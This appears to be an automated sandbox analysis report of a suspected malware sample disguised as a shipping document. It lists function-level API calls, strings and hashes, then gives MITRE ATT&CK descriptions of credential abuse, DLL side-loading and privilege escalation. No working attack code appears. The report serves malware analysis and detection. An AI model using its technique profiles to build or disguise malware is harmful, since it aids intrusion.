Instruction ID: 59f1889945e33acde156dd7f5d44a3d294fe6a44153227ece464a3d8874d4dcb
Opcode Fuzzy Hash: bcebf63246875870777793385be06660e76619a49d65058f433d392a5e5e27aa
Instruction Fuzzy Hash: F8112671B0020A6FEF118F14CC80EFB376BEB483A4F144126FA189B390D6359C51A7A0

Function 00FD3643 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F479B6: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F479F4
Part of subcall function 00F479B6: GetStockObject.GDI32(00000011), ref: 00F47A08
Part of subcall function 00F479B6: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F47A12

GetWindowRect.USER32(00000000,?), ref: 00FD36AD
GetSysColor.USER32(00000012), ref: 00FD36C7

Strings

static, xrefs: 00FD368A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 29e35dc80c9b62156c5356992a4989e7706520b6d3c9f7639fefe30a3785721c
Instruction ID: 8c3f63f69f0a3f6e12322ef4d1f6e1bc3f534873dd21b68c3f77e229529b35a7
Opcode Fuzzy Hash: 29e35dc80c9b62156c5356992a4989e7706520b6d3c9f7639fefe30a3785721c
Instruction Fuzzy Hash: 0E114472A1020AAFDB00DFB8CC45EEA7BA9EB08354F044516FE56E2240E635E850EB60

Function 00FBCC3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FBCC9B
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FBCCC4

Strings

<local>, xrefs: 00FBCC84

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 54e3b67a4ff9936024d60711a3a2c076d4b2c695fef33f1402277242c2cf0157
Instruction ID: 8eada107fad36e39c38d8fe1b21eb119723995ddfb90add3e2d5c0faf24f9740
Opcode Fuzzy Hash: 54e3b67a4ff9936024d60711a3a2c076d4b2c695fef33f1402277242c2cf0157
Instruction Fuzzy Hash: 9A11C6B2601676BAD7344B67CC49FE7BE5DEB227B4F00421AB15D93180D6609840EAF0

Function 00FD335C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00FD33DE
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00FD33ED

Strings

edit, xrefs: 00FD33C2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 003b5d34e0e188b6c59bbb699a4332732d6c01f492d136e5232ff2d7b9ca4dfc
Instruction ID: 62e7c1c3476ecc46fb0ff232ba9792130dbe6d3fa138ca44aca2ae3dfa187c88
Opcode Fuzzy Hash: 003b5d34e0e188b6c59bbb699a4332732d6c01f492d136e5232ff2d7b9ca4dfc
Instruction Fuzzy Hash: EE11BF72900208AFEF108E64DD44AEB3B6BEB05374F144716FA64932D0CB75EC51B7A1

Function 00FA6BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

CharUpperBuffW.USER32(?,?,?), ref: 00FA6C0C
_wcslen.LIBCMT ref: 00FA6C18

Strings

STOP, xrefs: 00FA6C12, 00FA6C17

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: bd638dc395880ecc4fa5b6a83a8717f94ee4200097e9182e16cbf5a1d8ddb54d
Instruction ID: 7d65101530b30dd4c2af1f689b70a5d705653b50fe5ae60f04c7ac8041cb242c
Opcode Fuzzy Hash: bd638dc395880ecc4fa5b6a83a8717f94ee4200097e9182e16cbf5a1d8ddb54d
Instruction Fuzzy Hash: 3B01D6729005278BCB11AFBDCC849BF77A5EF62735B040524E8A1D7191EB34D900F650

Function 00FA1C22 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FA3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00FA3C12

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FA1C90

Strings

ComboBox, xrefs: 00FA1C2F
ListBox, xrefs: 00FA1C5A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9016ef7813e3cf28457d8882cc25780480a2ee05228ba87f929f46aa250a8e76
Instruction ID: b535272fda22d747cefb78978b1a34bd3ba5493256ede94e42f6fe80ad29e9cc
Opcode Fuzzy Hash: 9016ef7813e3cf28457d8882cc25780480a2ee05228ba87f929f46aa250a8e76
Instruction Fuzzy Hash: AB01F5B1E511146BCB05EF64CC518FE7769BF463A0F040609F862572C2EA359908EA60

Function 00FA1B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FA3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00FA3C12

SendMessageW.USER32(?,00000180,00000000,?), ref: 00FA1B8A

Strings

ComboBox, xrefs: 00FA1B29
ListBox, xrefs: 00FA1B54

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9f2bf446c55cdeed469801bea4a1da259529bac006a8ce13393ea9439095527e
Instruction ID: 0bf77e7c6d75cc802ed4f7929007f474ea9ea3ddb8c34bbe30de743169996c20
Opcode Fuzzy Hash: 9f2bf446c55cdeed469801bea4a1da259529bac006a8ce13393ea9439095527e
Instruction Fuzzy Hash: D401F7B5A4110867CB14EBA1CC51EFE77A89B463C0F110019B80277282FB14DE08EBB1

Function 00FA1BA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FA3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00FA3C12

SendMessageW.USER32(?,00000182,?,00000000), ref: 00FA1C0C

Strings

ComboBox, xrefs: 00FA1BAD
ListBox, xrefs: 00FA1BD8

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 803b20fc85519eb3978993e3eea09faccc6d2e2ff8c142ae464f7df300dc764a
Instruction ID: 5c99bedfa1cff68f147de8f94feb038aa10dcc2cb21d35ba7eb49ac5b34c095c
Opcode Fuzzy Hash: 803b20fc85519eb3978993e3eea09faccc6d2e2ff8c142ae464f7df300dc764a
Instruction Fuzzy Hash: F801D6F1B8110867DB14EFA5CD51AFF77A89F12390F150016B802B7282EA25DF09AA71

Function 00FA1CAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

Part of subcall function 00FA3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 00FA3C12

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00FA1D17

Strings

ComboBox, xrefs: 00FA1CB9
ListBox, xrefs: 00FA1CE4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8de144072723f366e766dd2a7f794f6d010130f45f713bf8a1caddaf23dced55
Instruction ID: 8915a4d3ad048a5a6b09f83d570f786711b96c5d344ac46a74355eeca21aa8a7
Opcode Fuzzy Hash: 8de144072723f366e766dd2a7f794f6d010130f45f713bf8a1caddaf23dced55
Instruction Fuzzy Hash: 23F028B1E4121967DB14FBA4CC52FFE776CBF02390F110916F822672C2EB65E908E660

Function 00FC73A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FC73BA
_wcslen.LIBCMT ref: 00FC73E0

Strings

3, 3, 16, 0, xrefs: 00FC73AA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 0
API String ID: 176396367-3261555341
Opcode ID: 4afea5191fdde8119c23bf568a97bfee93d03d8942f16fe70db39940ce0f2555
Instruction ID: bc16ffa27ee774355050f2e611b6f02defb544744596ea61299a9827263924ce
Opcode Fuzzy Hash: 4afea5191fdde8119c23bf568a97bfee93d03d8942f16fe70db39940ce0f2555
Instruction Fuzzy Hash: 10E0231171439110923532755DC3E7F6188EFC97A0710142FFC81C3195EB849C92B391

Function 00FA0A59 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FA0A67

Strings

AutoIt, xrefs: 00FA0A5B
Error allocating memory., xrefs: 00FA0A60

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 41b7f14f11ca0c8951491521bf54183afe311e514ee4f2b0e90ed2425e7bb838
Instruction ID: 9d8d7fc64d092b3c6df5067ca2bd58e2be3bbabb0d3d2a4875c58c3c55551d58
Opcode Fuzzy Hash: 41b7f14f11ca0c8951491521bf54183afe311e514ee4f2b0e90ed2425e7bb838
Instruction Fuzzy Hash: 28E0D83234830926D31037A4AC07FC97A998F05B61F14442AFB48981C38ED6249476D9

Function 00F60CC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00F5F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F60CF1,?,?,?,00F4100A), ref: 00F5F8AD

IsDebuggerPresent.KERNEL32(?,?,?,00F4100A), ref: 00F60CF5
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F4100A), ref: 00F60D04

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F60CFF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 5bf5ae114309bc42a26714ab11a30c3aa97ac8bd8b2364574b2a7b542703bede
Instruction ID: 4138ab6aa5ee1f62dc1907bc9c6bf35cbf869cfebe5e7967051a77bd4c5b0b03
Opcode Fuzzy Hash: 5bf5ae114309bc42a26714ab11a30c3aa97ac8bd8b2364574b2a7b542703bede
Instruction Fuzzy Hash: F3E06D702007018BD3209FB8E8047437BE1AB10746F148A6EE886C2756DFB8E448EBA1

Function 00FB2F35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00FB2F4D
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00FB2F62

Strings

aut, xrefs: 00FB2F56

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 16d4956786eebc62d22ee1590c4a984d3338b2fe52e4a833f2fe19770038f0da
Instruction ID: 26e907b57f5e37e0b2e77555f3be111a2e65e8eb125cb9c40f241ed86c7724d6
Opcode Fuzzy Hash: 16d4956786eebc62d22ee1590c4a984d3338b2fe52e4a833f2fe19770038f0da
Instruction Fuzzy Hash: 09D05E7250132967DA60A7A59C0EFCB3B6CDB05751F0002A2B695D6091DAB0A984CAE0

Function 00F9D9B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F9D9BC

Strings

%.3d, xrefs: 00F9D9C7
X64, xrefs: 00F9DA44

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 36aea372260de766289e4b23f7295ef7a4cc132456fbd80b219927836fee3aec
Instruction ID: 42d097322299ac3591cd942e23e221d9cf4bbcdb05e6889eeab444154e9264da
Opcode Fuzzy Hash: 36aea372260de766289e4b23f7295ef7a4cc132456fbd80b219927836fee3aec
Instruction Fuzzy Hash: F7D01276809108E5EF909B909C45AB9737CAB08301F708452F946E1001E63C955CBB22

Function 00FD2289 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FD229F
PostMessageW.USER32(00000000), ref: 00FD22A6

Part of subcall function 00FAE899: Sleep.KERNEL32 ref: 00FAE911

Strings

Shell_TrayWnd, xrefs: 00FD2298

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a872eb8dc2b3ff1e96bb0ac83e8c584124e13b9d5e7853bd86287a8e0f1dd74b
Instruction ID: 354578d3ea011d70990b56b501f1a5354bd1fa792e5059b1d24fb4cfb866e989
Opcode Fuzzy Hash: a872eb8dc2b3ff1e96bb0ac83e8c584124e13b9d5e7853bd86287a8e0f1dd74b
Instruction Fuzzy Hash: 89D0A9713813093AE620A330AC0FFCA7B199B01B00F0048037209AA2D0C9A8A800D684

Function 00FD2255 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FD225F
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00FD2272

Part of subcall function 00FAE899: Sleep.KERNEL32 ref: 00FAE911

Strings

Shell_TrayWnd, xrefs: 00FD2258

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: d8b1082784073511f4f684aa3bea8bb5e623e57b9894a8022a38f06f34048e63
Instruction ID: 117c653c327f5997c4a40fba5e66f8a6599f8be6dab2749d641029050df08443
Opcode Fuzzy Hash: d8b1082784073511f4f684aa3bea8bb5e623e57b9894a8022a38f06f34048e63
Instruction Fuzzy Hash: 94D0A97139030976E620A330AC0FFCA7B199B00B00F0048037209AA2D0C9A8A800D680

Function 00F7BD9D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F7BE33
GetLastError.KERNEL32 ref: 00F7BE41
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F7BE9C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 62e19a59a4dd2962f3aad4f8a867a2442dba3286b33dca8f906e8f894705bb86
Instruction ID: daf901f71b300d23c384a76bd8aa34ab780535146ba4f563cc66cc2557e989aa
Opcode Fuzzy Hash: 62e19a59a4dd2962f3aad4f8a867a2442dba3286b33dca8f906e8f894705bb86
Instruction Fuzzy Hash: 7541D531A04216AFCB218F65CC54BFA7BA5EF02720F14C16BF95D9B2A1DB308C01EB52

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
